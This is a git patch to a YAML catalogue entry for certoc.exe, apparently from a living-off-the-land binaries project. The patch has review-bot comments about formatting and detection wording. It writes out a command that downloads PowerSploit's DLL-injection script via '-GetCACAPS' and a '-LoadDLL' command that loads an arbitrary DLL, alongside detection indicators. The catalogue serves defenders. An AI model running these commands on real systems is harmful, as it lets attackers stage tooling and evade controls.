From 97f5042a586880b13be9b3c097d9271fe798b85d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ensar=20=C5=9Eamil?= Date: Wed, 27 Oct 2021 12:02:52 +0300 Subject: [PATCH] Update Certoc.yml (#168) Co-authored-by: Wietze --- yml/OSBinaries/Certoc.yml | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index 54e5fd1..94bc2e4 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -2,7 +2,7 @@ Name: CertOC.exe Description: Used for installing certificates Author: 'Ensar Samil' -Created: '2021-10-07' +Created: 2021-10-07 Commands: - Command: certoc.exe -LoadDLL "C:\test\calc.dll" Description: Loads the target DLL file @@ -10,8 +10,16 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows Server 2022 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows Server 2022 + - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 + Description: Downloads text formatted files + Usecase: Download scripts, webshells etc. + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/techniques/T1105/ + OperatingSystem: Windows Server 2022 Full_Path: - Path: c:\windows\system32\certoc.exe - Path: c:\windows\syswow64\certoc.exe @@ -20,8 +28,10 @@ Code_Sample: Detection: - IOC: Process creation with given parameter - IOC: Unsigned DLL load via certoc.exe + - IOC: Network connection via certoc.exe Resources: - Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 + - Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20 Acknowledgement: - Person: Ensar Samil Handle: '@sblmsrsn'
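Review bot: In the first hunk (@@ -2,7 +2,7 @@), dropping the quotes from `Created: '2021-10-07'` changes the value's type: YAML 1.1 loaders resolve a bare 2021-10-07 to a date rather than a string, while the neighbouring `Author: 'Ensar Samil'` stays a quoted string. If the site generator or schema validation expects a string here, keep the quotes. If the unquoted form is the project convention, note that in the commit message, which currently only reads "Update Certoc.yml".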
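Review bot: In the second hunk (@@ -10,8 +10,16 @@), the new `-GetCACAPS` entry's `Description: Downloads text formatted files` does not say where the retrieved content ends up (console output or a file on disk), which a defender needs to know to choose between command-line and file-creation telemetry. Please state that explicitly. The example command also hardcodes a raw.githubusercontent.com URL to a third-party script; a neutral placeholder URL, in the same spirit as `C:\test\calc.dll` in the first command, would keep the entry stable if that file moves. The removed and re-added `OperatingSystem: Windows Server 2022` line under the first command looks like an indentation-only change, so confirm it is intentional.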
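Review bot: In the last hunk (@@ -20,8 +28,10 @@), `IOC: Network connection via certoc.exe` is the only detection added for the new download command, and the existing `IOC: Process creation with given parameter` still does not name which parameter. Suggest naming them, for example process creation of certoc.exe with `-LoadDLL` or with `-GetCACAPS` followed by a URL, so the entry can be turned into a rule without reading the linked tweets. The new Resources link also carries the `?s=20` share parameter, which can be dropped.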